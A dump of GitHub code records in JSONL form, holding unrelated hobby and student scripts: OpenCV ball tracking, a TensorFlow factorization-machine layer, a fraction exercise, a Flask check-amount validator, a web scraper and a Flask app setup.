main()\n","repo_name":"verisimilidude/TheCollectionsModule","sub_path":"analysis4.py","file_name":"analysis4.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"37277209646","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 17 17:51:29 2019\n\n@author: Binatang Kesusahan\n\"\"\"\nimport cv2 as cv\nimport numpy as np\nimport imutils\nimport 
rw_file as rw\n\nimport time\nimport serial as Serial\nfrom save_load import read as read\nfrom save_load import saveConfig as saveConfig\n\ndef serial(posisi):\n ser = Serial('/dev/ttyUSB0',)\n ser.baudrate = 115200\n \n while 1:\n if (posisi == '1'):\n ser.write(str(1).encode())\n print('kiri, 101')\n time.sleep(0.1)\n ser.write(str(0).encode())\n time.sleep(0.1)\n ser.write(str(1).encode())\n \n elif (posisi == '2'):\n print('kiri, nyala 1010 x')\n ser.write(str(1).encode())\n time.sleep(0.1)\n ser.write(str(0).encode())\n ser.write(str(1).encode())\n time.sleep(0.1)\n ser.write(str(0).encode())\n \n elif (posisi == '3'):\n ser.write(str(1).encode())\n time.sleep(0.1)\n ser.write(str(0).encode())\n time.sleep(0.1)\n ser.write(str(1).encode())\n time.sleep(0.1)\n ser.write(str(0).encode())\n time.sleep(0.1)\n ser.write(str(1).encode())\n time.sleep(0.1)\n ser.write(str(0).encode())\n \n \n print(ser.readline())\n return 0\n\ndef centroid(contours):\n# center =0\n# cx =0 \n# cy =0\n \n c = max(contours, key= cv.contourArea)\n ((x,y), radius) = cv.minEnclosingCircle(c)\n M = cv.moments(c)\n \n # untuk calculate centroid\n if int(M[\"m00\"])> 0:\n cx = int(M[\"m10\"]) / int(M[\"m00\"])\n cy = int(M[\"m01\"]) / int(M[\"m00\"])\n center = (int(cx), int(cy)) \n \n else:\n center = (1,1) \n return(radius,center, cx, cy,x,y)\n \ndef saveConfig(value, file_name):\n value = str(value)\n filename = file_name + \".txt\"\n file = open(str(filename), \"w\")\n file.write(value)\n file.close()\n\n\ndef gawang(hsv):\n \n l_h = int(read(\"setting/LH_gawang.txt\"))\n l_s = int(read(\"setting/LS_gawang.txt\"))\n l_v = int(read(\"setting/LV_gawang.txt\"))\n u_h = int(read(\"setting/UH_gawang.txt\"))\n u_s = int(read(\"setting/US_gawang.txt\"))\n u_v = int(read(\"setting/UV_gawang.txt\"))\n \n lower_color = np.array([l_h,l_s,l_v])\n upper_color = np.array([u_h,u_s,u_v])\n \n mask = cv.inRange(hsv, lower_color, upper_color)\n kernel = np.ones((5,5), np.uint8)\n \n mask = cv.erode(mask, kernel)\n \n _, contours, _ = cv.findContours(mask, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n \n if len(contours) > 0:\n radius_gawang, center_gawang, cx_gawang, cy_gawang, _, _ = centroid(contours)\n return(radius_gawang, center_gawang, cx_gawang, cy_gawang)\n \n \ncap = cv.VideoCapture(0)\ncap.set(cv.CAP_PROP_FRAME_WIDTH, 120)\ncap.set(cv.CAP_PROP_FRAME_HEIGHT, 240)\n\ncv.namedWindow(\"trackbars\", cv.WINDOW_NORMAL)\ncv.resizeWindow(\"trackbars\", 300, 500)\ncv.createTrackbar(\"L - H\", \"trackbars\", int(rw.read(\"setting/LH.txt\")), 179, lambda x: rw.write(x, \"setting/LH.txt\"))\ncv.createTrackbar(\"L - S\", \"trackbars\", int(rw.read(\"setting/LS.txt\")), 255, lambda x : rw.write(x, \"setting/LS.txt\"))\ncv.createTrackbar(\"L - V\", \"trackbars\", int(rw.read(\"setting/LV.txt\")), 255, lambda x : rw.write(x, \"setting/LV.txt\"))\ncv.createTrackbar(\"U - H\", \"trackbars\", int(rw.read(\"setting/UH.txt\")), 179, lambda x: rw.write(x, \"setting/UH.txt\"))\ncv.createTrackbar(\"U - S\", \"trackbars\", int(rw.read(\"setting/US.txt\")), 255, lambda x: rw.write(x, \"setting/US.txt\"))\ncv.createTrackbar(\"U - V\", \"trackbars\", int(rw.read(\"setting/UV.txt\")), 255, lambda x : rw.write(x, \"setting/UV.txt\"))\n\ncv.createTrackbar(\"dilation\", \"trackbars\", int(rw.read(\"setting/dilation_bola.txt\")), 50, lambda x : rw.write(x, \"setting/dilation_bola.txt\"))\ncv.createTrackbar(\"Dilation iterations\", \"trackbars\", int(rw.read(\"setting/dilation_iteration_bola.txt\")), 200, lambda x : rw.write(x, 
\"setting/dilation_iteration_bola.txt\"))\ncv.createTrackbar(\"erosion\", \"trackbars\", int(rw.read(\"setting/erosion_bola.txt\")), 50, lambda x : rw.write(x, \"setting/erosion_bola.txt\"))\ncv.createTrackbar(\"Erosion iterations\", \"trackbars\", int(rw.read(\"setting/erosion_iteration_bola.txt\")), 200, lambda x : rw.write(x, \"setting/erosion_iteration_bola.txt\"))\ncv.createTrackbar(\"gaussian\", \"trackbars\", int(rw.read(\"setting/gaussian_bola.txt\")), 20, lambda x : rw.write(x, \"setting/gaussian_bola.txt\"))\ncv.createTrackbar(\"radius\", \"trackbars\", int(rw.read(\"setting/radius_bola.txt\")), 50, lambda x : rw.write(x, \"setting/radius_bola.txt\"))\n\n\n\nwhile True:\n ret, frame = cap.read()\n frame = imutils.resize(frame, width=300)\n tinggi, panjang, _ = frame.shape\n\n gaussian_kernel = int(rw.read(\"setting/gaussian_bola.txt\"))\n if gaussian_kernel == 0:\n gaussian_kernel = 1\n else:\n gaussian_kernel = (2*gaussian_kernel)+1\n\n frame = cv.GaussianBlur(frame, (gaussian_kernel,gaussian_kernel), 0)\n hsv = cv.cvtColor(frame, cv.COLOR_BGR2HSV)\n\n l_h = int(rw.read(\"setting/LH.txt\"))\n l_s = int(rw.read(\"setting/LS.txt\"))\n l_v = int(rw.read(\"setting/LV.txt\"))\n u_h = int(rw.read(\"setting/UH.txt\"))\n u_s = int(rw.read(\"setting/US.txt\"))\n u_v = int(rw.read(\"setting/UV.txt\"))\n\n lower_white = np.array([l_h,l_s,l_v])\n upper_white = np.array([u_h,u_s,u_v])\n\n mask = cv.inRange(hsv, lower_white, upper_white)\n\n erosion = int(rw.read(\"setting/erosion_bola.txt\"))\n\n if erosion == 0:\n erosion = 1\n else:\n erosion = (2*erosion)+1\n\n dilation= int(rw.read(\"setting/dilation_bola.txt\"))\n if dilation == 0:\n dilation = 1\n else:\n dilation = (2*dilation)+1\n\n erosion_iterations = int(rw.read(\"setting/erosion_iteration_bola.txt\"))\n dilation_iterations = int(rw.read(\"setting/dilation_iteration_bola.txt\"))\n\n erosion_kernel = cv.getStructuringElement(cv.MORPH_RECT, (erosion, erosion))\n dilation_kernel = cv.getStructuringElement(cv.MORPH_RECT, (dilation, dilation))\n\n mask = cv.erode(mask, erosion_kernel, iterations = erosion_iterations)\n mask = cv.dilate(mask, dilation_kernel, iterations = dilation_iterations)\n\n result = cv.bitwise_and(frame, frame, mask = mask)\n\n contours, _ = cv.findContours(mask, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n\n x = 0\n y = 0\n radius = 0\n center_gawang = 0\n radius_gawang = 0\n cx_gawang = 0\n cy_gawang = 0\n\n rads_gawang = int(read(\"setting/area_gawang.txt\"))\n \n if len(contours) > 0:\n radius, center, cx, cy, x, y = centroid(contours)\n \n rads = int(read(\"setting/radius.txt\"))\n if radius > rads :\n \n if x < panjang/3 and y < 2*tinggi/3:\n print(\"kiri atas\")\n posisi = 1\n# serial(posisi)\n radius_gawang, center_gawang, cx_gawang, cy_gawang = gawang(hsv)\n if radius_gawang > rads_gawang:\n cv.circle(result, center_gawang, 5, (0,0,255), -1)\n cv.putText(result, \"x : {} y : {}\".format(int(cx_gawang), int(cy_gawang)), (10, frame.shape[0]-70), cv.FONT_HERSHEY_COMPLEX_SMALL,0.8, (10,255,10))\n cv.putText(result, \"KIRI ATAS\", (10, tinggi - 40), cv.FONT_HERSHEY_SIMPLEX, 0.5, (100,255,10), 1)\n \n elif x < 2*panjang/3 and y < 2*tinggi/3:\n print(\"tengah atas\")\n posisi = 2\n# serial(posisi)\n radius_gawang, center_gawang, cx_gawang, cy_gawang = gawang(hsv)\n if radius_gawang > rads_gawang:\n cv.circle(result, center_gawang, 5, (0,0,255), -1)\n cv.putText(result, \"x : {} y : {}\".format(int(cx_gawang), int(cy_gawang)), (10, frame.shape[0]-70), cv.FONT_HERSHEY_COMPLEX_SMALL,0.8, (10,255,10))\n 
cv.putText(result, \"TENGAH ATAS\", (10, tinggi - 40), cv.FONT_HERSHEY_SIMPLEX, 0.5, (100,250,10),1)\n \n elif x > 2*panjang/3 and y < 2*tinggi/3:\n print(\"kanan atas\")\n posisi = 3\n# serial(posisi)\n radius_gawang, center_gawang, cx_gawang, cy_gawang = gawang(hsv)\n if radius_gawang > rads_gawang:\n cv.circle(result, center_gawang, 5, (0,0,255), -1)\n cv.putText(result, \"x : {} y : {}\".format(int(cx_gawang), int(cy_gawang)), (10, frame.shape[0]-70), cv.FONT_HERSHEY_COMPLEX_SMALL,0.8, (10,255,10))\n cv.putText(result, \"KANAN ATAS\", (10, tinggi - 40), cv.FONT_HERSHEY_SIMPLEX, 0.5, (100,250,10),1)\n \n cv.circle(result, (int(x), int(y)), int(radius), (0,255,255), 2)\n cv.circle(result, center, 5, (0,0,255), -1)\n cv.putText(result, \"x : {} y : {}\".format(int(cx), int(cy)), (10, tinggi-25), cv.FONT_HERSHEY_COMPLEX_SMALL,0.8, (10,255,10))\n \n\n end = time.time()\n fps = str(int(1/(end-start)))\n cv.putText(result, fps, (10, tinggi-55), cv.FONT_HERSHEY_COMPLEX_SMALL,0.8, (10,255,10))\n# Buat Garis Area di Layar\n cv.line(result, (int(panjang/3), tinggi), (int(panjang/3),0), (0,255,0), 2) #kiri\n cv.line(result, (int(2*panjang/3), tinggi), (int(2*panjang/3),0), (0,255,0), 2) # kanan\n cv.line(result, (0, int(2*tinggi/3)), (panjang, int(2*tinggi/3) ), (123,10,32), 2) #bawah\n \n \n cv.imshow(\"result\", result)\n cv.imshow(\"mask\", mask)\n\n\n x = 0\n y = 0\n radius = 0\n center = None\n\n if len(contours) > 0:\n c = max(contours, key=cv.contourArea)\n ((x, y), radius) = cv.minEnclosingCircle(c)\n M = cv.moments(c)\n\n cx = None\n cy = None\n\n if int(M[\"m00\"]) > 0:\n cx = int(M[\"m10\"]) / int(M[\"m00\"])\n cy = int(M[\"m01\"]) / int(M[\"m00\"])\n center = (int(cx), int(cy))\n\n rads = int(rw.read(\"setting/radius_bola.txt\"))\n if radius > rads :\n\n cv.circle(result, (int(x), int(y)), int(radius), (0,255,255), 2)\n cv.circle(result, center, 5, (0,0,255), -1)\n cv.putText(result, \"x : {} y : {}\".format(int(x), int(y)), (10, tinggi-25), cv.FONT_HERSHEY_COMPLEX_SMALL,0.8, (10,255,10))\n\n cv.line(result, (int(panjang/3), tinggi), (int(panjang/3),0), (0,255,0), 2) #kiri\n cv.line(result, (int(2*panjang/3), tinggi), (int(2*panjang/3),0), (0,255,0), 2) # kanan\n cv.line(result, (0, int(2*tinggi/3)), (panjang, int(2*tinggi/3) ), (123,10,32), 2) #bawah\n\n cv.imshow(\"result\", result)\n cv.imshow(\"mask\", mask)\n cv.imshow(\"frame\", frame)\n\n key = cv.waitKey(1)\n if key == 27:\n break\n\ncap.release()\ncv.destroyAllWindows()\n","repo_name":"SMAMHTN/bascorro_cv","sub_path":"OldScript/bola_lama.py","file_name":"bola_lama.py","file_ext":"py","file_size_in_byte":10605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70198888245","text":"'''\n# Time : 2020/10/22 10:42\n# Author : junchaoli\n# File : model.py\n'''\n\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Layer\nfrom tensorflow.keras.layers import Input, Dense\n\nclass FM_layer(Layer):\n def __init__(self, k, w_reg, v_reg):\n super().__init__()\n self.k = k\n self.w_reg = w_reg\n self.v_reg = v_reg\n\n def build(self, input_shape):\n self.w0 = self.add_weight(name='w0', shape=(1,),\n initializer=tf.zeros_initializer(),\n trainable=True,)\n self.w = self.add_weight(name='w', shape=(input_shape[-1], 1),\n initializer=tf.random_normal_initializer(),\n trainable=True,\n regularizer=tf.keras.regularizers.l2(self.w_reg))\n self.v = self.add_weight(name='v', shape=(input_shape[-1], self.k),\n initializer=tf.random_normal_initializer(),\n trainable=True,\n 
regularizer=tf.keras.regularizers.l2(self.v_reg))\n\n def call(self, inputs, **kwargs):\n linear_part = tf.matmul(inputs, self.w) + self.w0 #shape:(batchsize, 1)\n\n inter_part1 = tf.pow(tf.matmul(inputs, self.v), 2) #shape:(batchsize, self.k)\n inter_part2 = tf.matmul(tf.pow(inputs, 2), tf.pow(self.v, 2)) #shape:(batchsize, self.k)\n inter_part = 0.5*tf.reduce_sum(inter_part1 - inter_part2, axis=-1, keepdims=True) #shape:(batchsize, 1)\n\n output = linear_part + inter_part\n return output\n\nclass Dense_layer(Layer):\n def __init__(self, hidden_units, output_dim, activation):\n super().__init__()\n self.hidden_units = hidden_units\n self.output_dim = output_dim\n self.activation = activation\n\n self.hidden_layer = [Dense(i, activation=self.activation)\n for i in self.hidden_units]\n self.output_layer = Dense(self.output_dim, activation=None)\n\n def call(self, inputs):\n x = inputs\n for layer in self.hidden_layer:\n x = layer(x)\n output = self.output_layer(x)\n return output\n","repo_name":"jc-LeeHub/Recommend-System-tf2.0","sub_path":"DeepFM/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":571,"dataset":"github-code","pt":"76"} +{"seq_id":"13345387862","text":"# Напишите программу, которая принимает две строки вида “a/b” - дробь с числителем и знаменателем. \n# Программа должна возвращать сумму и произведение* дробей. \n# Для проверки своего кода используйте модуль fractions.\nfrom fractions import Fraction\nfrom math import gcd\n\na1, b1 = map(int, input('Введите первое число в формате “a/b” ').split('/'))\na2, b2 = map(int, input('Введите второе число в формате “a/b” ').split('/'))\nf_one = Fraction(a1, b1)\nf_two = Fraction(a2, b2)\n\n\nprint('Произведение равно ''{}/{}'.format(a1 * a2, b1 * b2))\n\nif b1 == b2:\n print('Сумма равна ''{}/{}'.format(a1+a2, b1))\nelse:\n cd = int(b1*b2/gcd(b1, b2))\n rn = int(cd/b1*a1+cd/b2*a2)\n g2 = gcd(rn, cd)\n a = int(rn/g2)\n b = int(cd/g2)\n print('Сумма равна ''{}/{}'.format(a, b) if a != b else a)\n\n\nprint('Произведение через модуль fractions равно ',f_one * f_two)\nprint('Сумма через модуль fractions равно ', f_one + f_two)\n\n\n ","repo_name":"Marina48Lip/PYTHON_2","sub_path":"dz2_2.py","file_name":"dz2_2.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20653033862","text":"from pyexcel_xlsx import save_data\nfrom collections import OrderedDict\nfrom example.dbModel import *\n\nif __name__ == '__main__':\n db_data = University.query.all()\n first_row = [[\"ID\", \"縣市\", \"學校\"]]\n for index, data in enumerate(db_data, start=1):\n County = data.County\n University = data.University\n first_row.append([index, County, University])\n\n dic = OrderedDict()\n\n dic.update({\"Sheet 1\": first_row})\n save_data(\"Excel-data.xlsx\", dic)\n print('SQL Database TO Excel DONE')\n","repo_name":"twtrubiks/Google-Play-Store-spider-bs4-excel","sub_path":"example/SQL_Database_To_Excel.py","file_name":"SQL_Database_To_Excel.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"26610703148","text":"import pickle\nfrom flask import Flask , render_template , request\n\napp = Flask(__name__)\n\n\n@app.route('/' , methods=['GET'])\ndef hello_world():\n \n return render_template('index.html')\n\n\n # Python3 program to print a given number in words.\n# The program 
handles till 9 digits numbers and\n# can be easily extended to 20 digit number\n \n# strings at index 0 is not used, it\n# is to make array indexing simple\none = [ \"\", \"one \", \"two \", \"three \", \"four \",\n \"five \", \"six \", \"seven \", \"eight \",\n \"nine \", \"ten \", \"eleven \", \"twelve \",\n \"thirteen \", \"fourteen \", \"fifteen \",\n \"sixteen \", \"seventeen \", \"eighteen \",\n \"nineteen \"];\n \n# strings at index 0 and 1 are not used,\n# they is to make array indexing simple\nten = [ \"\", \"\", \"twenty \", \"thirty \", \"forty \",\n \"fifty \", \"sixty \", \"seventy \", \"eighty \",\n \"ninety \"];\n \n# n is 1- or 2-digit number\ndef numToWords(n, s):\n \n str = \"\";\n \n # if n is more than 19, divide it\n if (n > 19):\n str += ten[n // 10] + one[n % 10];\n else:\n str += one[n];\n # if n is non-zero\n if (n):\n str += s;\n \n return str;\n \n# Function to print a given number in words\ndef convertToWords(n):\n \n # stores word representation of given\n # number n\n out = \"\";\n \n # handles digits at ten millions and\n # hundred millions places (if any)\n out += numToWords((n // 10000000),\n \"crore \");\n \n # handles digits at hundred thousands\n # and one millions places (if any)\n out += numToWords(((n // 100000) % 100),\n \"lakh \");\n \n # handles digits at thousands and tens\n # thousands places (if any)\n out += numToWords(((n // 1000) % 100),\n \"thousand \");\n \n # handles digit at hundreds places (if any)\n out += numToWords(((n // 100) % 10),\n \"hundred \");\n \n if (n > 100 and n % 100):\n out += \"and \";\n \n # handles digits at ones and tens\n # places (if any)\n out += numToWords((n % 100), \"\");\n \n return out;\n \n# Driver code\n \n# long handles upto 9 digit no\n# change to unsigned long long\n# int to handle more digit number\nn = 438237764;\n \n# convert given number in words\nprint(convertToWords(n));\n\n# This code is contributed by mits \n\ndef parse_int(textnum, numwords={}):\n # create our default word-lists\n if not numwords:\n\n # singles\n units = [\n \"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\", \"eight\",\n \"nine\", \"ten\", \"eleven\", \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\",\n \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\",\n ]\n\n # tens\n tens = [\"\", \"\", \"twenty\", \"thirty\", \"forty\", \"fifty\", \"sixty\", \"seventy\", \"eighty\", \"ninety\"]\n\n # larger scales\n scales = [\"hundred\", \"thousand\",\"lakh\", \"core\", \"billion\", \"trillion\"]\n\n # divisors\n numwords[\"and\"] = (1, 0)\n\n # perform our loops and start the swap\n for idx, word in enumerate(units): numwords[word] = (1, idx) \n for idx, word in enumerate(tens): numwords[word] = (1, idx * 10)\n for idx, word in enumerate(scales): numwords[word] = (10 ** ( idx * 2 + 1 or 2), 0)\n\n # primary loop\n current = result = 0\n # loop while splitting to break into individual words\n for word in textnum.replace(\"-\",\" \").split():\n # if problem then fail-safe\n if word not in numwords:\n raise Exception(\"Illegal word: \" + word)\n\n # use the index by the multiplier\n scale, increment = numwords[word]\n current = current * scale + increment\n \n # if larger than 100 then push for a round 2\n if scale > 100:\n result += current\n current = 0\n\n # return the result plus the current\n return result + current \n\n\n\n\nchaine='one thousand twenty thousand'\nchiffre=120000\ndef correction(chaine,chiffre):\n l='lakh'\n t='thousand'\n c='crore'\n l1=0\n t1=0\n c1=0\n mylist=chaine.split(' ')\n for i 
in range(len(mylist)):\n if mylist[i]=='lakh':\n l1=l1+1\n if mylist[i]=='thousand':\n t1=t1+1\n if mylist[i]=='crore':\n c1=c1+1\n if(l1>1 or t1>1 or h1>1 or c1>1):\n amount=(convertToWords(chiffre))\n print('the check is not valid : the letter amount is incorrect \\n ====> Here is the autocorrection :')\n print('the real amount is : ',amount,chiffre)\n \n \n else:\n if (parse_int(chaine)==chiffre):\n print('the check is valid');\n print('the real amount is :',chiffre,chaine)\n \n else:\n amount=(parse_int(chaine))\n print('the check is not valid : the number amount is incorrect \\n ====> Here is the autocorrection :')\n print('the real amount is : ',chaine,amount)\n \n \n \n return('The check is not valid : the number amount is incorrect ,Here is the autocorrection : the real amount is : ',chaine , str(chiffre))\n\n\n\n@app.route('/',methods=['GET','POST'])\ndef predict():\n imagefile= request.files['imagefile']\n image_path = \"./static/\" + imagefile.filename\n imagefile.save(image_path)\n v=correction(chaine,chiffre)\n return render_template('index.html',prediction=v)\n\n\nif __name__ == '__main__':\n app.run(port=3000, debug=True)","repo_name":"khalfallah-fatma/Template","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42101364120","text":"\ndef solution(brown, yellow):\n for i in range(3,(brown+yellow)//3+1):\n Y = i\n if not (brown+yellow)%Y: # 정수이면\n X = (brown+yellow)//Y # X값을 구한다\n if not yellow%(Y-2): # yellow를 (Y-2)나눈 값이 정수이면\n yellowY = Y-2\n if not (yellow)%yellowY and yellow//yellowY < X: # yellow를 yellowY로 나눴을 때 정수이면\n answer = [X,Y]\n return answer\n\n\nbrown = 10\nbrown = 8\nbrown = 24\nyellow = 2\nyellow = 1\nyellow = 24\nprint(solution(brown,yellow))\nprint(solution(8,1))\n","repo_name":"DailyCodingMem/DailyCoding","sub_path":"MakeMoneying/programmers/카펫.py","file_name":"카펫.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"8346496306","text":"#! 
/usr/bin/python3\n\n#Download Light Novel Chapters\n#And write to file (formatted)\n\nimport os\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport urllib.request\nimport requests\nimport sys\n\n#link:\n#https://jingletranslations.wordpress.com/i-favor-the-villainess/\n\n#Setup browser and beautiful soup\ndef setupBrowser():\n global browser\n global url\n browser = webdriver.Chrome(\"/usr/lib/chromium-browser/chromedriver\")\n browser.get(url)\n \ndef setupSoup():\n global browser\n global content\n global soup\n content = browser.page_source\n soup = BeautifulSoup(content, 'html.parser')\n \n#print\ndef printAll():\n global soup\n print(soup.prettify())\n\ndef printContentDiv():\n global soup\n global content\n content = soup.find('div', class_='entry-content').find_all('a')\n #headers = soup.find('div', class_='entry-content').find_all('h4')\n #print chapter title and links\n #NEXT: find chapters by sections then print\n setList()\n \n#Other functions\ndef setList():\n global urlList\n global titleList\n global content\n for link in content:\n url = link.get('href')\n title = link.string\n #print('Title: ',title)\n #print('Link: ',url)\n urlList.append(url)\n titleList.append(title)\n print('URL:', urlList)\n print('TITLE: ',titleList)\n \ndef closeBrowser():\n global browser\n browser.close()\n \n#Main function\ndef main():\n global url\n \n print('from main()')\n while url == '':\n url = input('Enter LN Main Title link: ')\n \n setupBrowser()\n setupSoup()\n \n try:\n printContentDiv()\n except:\n print(sys.exc_info()[0])\n #closeBrowser()\n \n closeBrowser()\n\n#Global Variables\nbrowser = ''\nurl = ''\nsoup = ''\ncontent = ''\nurlList = []\ntitleList = []\n\n#Program\nmain()\n","repo_name":"Tavi66/Web_Scraper","sub_path":"Light_Novel.py","file_name":"Light_Novel.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15114767566","text":"#!/usr/bin/env python3.6.7\r\n# -*- coding: UTF-8 -*-\r\n\"\"\"\r\nAuthor: Patrick\r\n\r\nDate: 2021/6/22 1:09\r\n\r\nDocs: \r\n \r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nimport plotly.graph_objs as go\r\nimport dash\r\nimport dash_bootstrap_components as dbc\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nimport plotly.express as px\r\nfrom dash.dependencies import Input, Output, State\r\n\r\nfrom depoverty import layout as dplayout\r\nfrom boxplot import layout as bxlayout\r\n\r\npx.set_mapbox_access_token(\r\n \"pk.eyJ1IjoicGF0cmlja3BybyIsImEiOiJja3E2cWZ5OXAwMHcwMm5zM3NoNTYwcnV5In0.KvBQYukBha-vWqMJp2isqw\")\r\n\r\nexternal_stylesheets = [dbc.themes.BOOTSTRAP]\r\n\r\napp = dash.Dash(external_stylesheets=external_stylesheets, suppress_callback_exceptions=True)\r\n\r\n# the style arguments for the sidebar. 
We use position:fixed and a fixed width\r\nSIDEBAR_STYLE = {\r\n \"position\": \"fixed\",\r\n \"top\": 0,\r\n \"left\": 0,\r\n \"bottom\": 0,\r\n \"width\": \"18rem\",\r\n \"padding\": \"2rem 2rem\",\r\n \"background-color\": \"#f8f9fa\",\r\n}\r\n\r\n# the styles for the main content position it to the right of the sidebar and add some padding.\r\nCONTENT_STYLE = {\r\n \"margin-left\": \"18rem\",\r\n \"margin-right\": \"2rem\",\r\n \"padding\": \"10rem 10rem\",\r\n}\r\n\r\nsidebar = html.Div(\r\n [\r\n html.H4(\"Poverty\", className=\"display-4\"),\r\n html.Hr(),\r\n dbc.Nav(\r\n [\r\n dbc.NavLink(\"Home\", href=\"/\", active=\"exact\"),\r\n dbc.NavLink(\"Rehabilitate\", href=\"/rehabilitate\", active=\"exact\"),\r\n dbc.NavLink(\"Distribution\", href=\"/distribution\", active=\"exact\"),\r\n ],\r\n vertical=True,\r\n pills=True,\r\n ),\r\n ],\r\n style=SIDEBAR_STYLE,\r\n)\r\n\r\ncontent = html.Div(id=\"page-content\", style=CONTENT_STYLE)\r\n\r\napp.layout = html.Div(\r\n [\r\n dcc.Location(id=\"url\"), sidebar, content,\r\n ]\r\n)\r\n\r\n\r\n@app.callback(\r\n Output(\"page-content\", \"children\"),\r\n [Input(\"url\", \"pathname\")]\r\n)\r\ndef render_page_content(pathname):\r\n if pathname == \"/\":\r\n return\r\n elif pathname == \"/rehabilitate\":\r\n return dplayout\r\n elif pathname == \"/distribution\":\r\n return bxlayout\r\n # If the user tries to reach a different page, return a 404 message\r\n return dbc.Jumbotron(\r\n [\r\n html.H1(\"404: Not found\", className=\"text-danger\"),\r\n html.Hr(),\r\n html.P(f\"The pathname {pathname} was not recognised...\"),\r\n ]\r\n )\r\n\r\n\r\ndf_data = pd.read_csv('data/use.csv')\r\ndf_data['density'] = df_data['a4']*1.0/df_data['a1']\r\n\r\n\r\n@app.callback(\r\n Output(\"box-plot\", \"figure\"),\r\n Input(\"y-axis\", \"value\"))\r\ndef generate_chart(y):\r\n fig = px.box(df_data, x='year', y=y)\r\n fig.update_layout(margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0})\r\n return fig\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)\r\n","repo_name":"Patrick-Rud/EDA-Visualization","sub_path":"project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72251695605","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom matplotlib import pyplot as plt\n\n# deklaracja stałych\nN = 1000.0\nI_0 = 1.0\n\na = \"\"\"WYPEŁNIĆ\"\"\" # prawdopodobieństwo wyzdrowienia\nr = \"\"\"WYPEŁNIĆ\"\"\" # prawdopodobieństwo zarażenia się\n\ntimes = 5000\ndt = 0.001\n\n# inicjalizacja zmiennych\nI = [I_0]\nS = [N - I_0]\nT = [0]\n\n# główna pętla\nfor i in range(1, times):\n I.append(\"\"\"WYPEŁNIĆ\"\"\")\n S.append(\"\"\"WYPEŁNIĆ\"\"\")\n T.append(T[i-1] + dt)\n\n# rysowanie wykresu\nsus, = plt.plot(T, S, color='b')\ninf, = plt.plot(T, I, color='r')\nplt.plot([0, times*dt], [a/r, a/r], 'k--')\nplt.legend([sus, inf], [u'zdrowi', u'chorzy'])\nplt.xlabel(u'Czas')\nplt.ylabel(u'Liczba osób')\nplt.show()\n","repo_name":"traducha/epidemics_DOKO2017","sub_path":"workshop/1_sis_sir.py","file_name":"1_sis_sir.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40572481029","text":"# coding=latin-1\n\n\"\"\"\nThe flask application package.\n\"\"\"\n\nfrom flask import Flask\nimport logging\nfrom flask_login import LoginManager\n# from flask.logging import default_handler\n\napp = Flask(__name__)\n\n\n# dictConfig= dict(\n# 
version = 1,\n# formatters = {\n# 'f': {'format':\n# '%(asctime)s %(name)-12s %(levelname)----8s %(message)s'}\n# },\n# handlers = {\n# 'h': {'class': 'logging.StreamHandler',\n# 'formatter': 'f',\n# 'level': logging.DEBUG}\n# },\n# root = {\n# 'handlers': ['h'],\n# 'level': logging.DEBUG,\n# },\n# )\n\n\n\n# app.logger.removeHandler(default_handler)\n# app.logger.config=dictConfig\n\n\n\nlogging.basicConfig(filename='demo.log', level=logging.DEBUG)\n\n# from logging.config import fileConfig\n# from os import path\n# import os\n\n# log_file_path = path.join(path.dirname(path.abspath(__file__)), 'logging.cfg')\n# path_rslv = path.split(path.dirname(path.abspath(__file__)))[1:] \n# fileName = path.join(*[\"..\" for dotdot in range(len(path_rslv))], \"logging.cfg\")\n# print(log_file_path)\n# print(f\"CWD = {os.getcwd()}\")\n# print(f\"fileName = {fileName}\")\n# fileConfig(\"logging.cfg\")\n\n\n\n# Accesso al DB\n##### app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:mysecretpassword@localhost/votazione'\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:mysecretpassword@kubernetes.docker.internal/votazione'\n# app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n# app.config['TESTING'] = True\n\n#from appconfig import ProductionConfig\n#app.config.from_object(ProductionConfig())\napp.config.from_pyfile('settings.cfg', silent=True)\n\n\n# Configure Login\napp.secret_key = app.config['SECRET_KEY']\nlogin_manager = LoginManager()\n#login_manager.login_view = 'auth.login'\nlogin_manager.init_app(app)\n\napp.logger.debug('Questo è 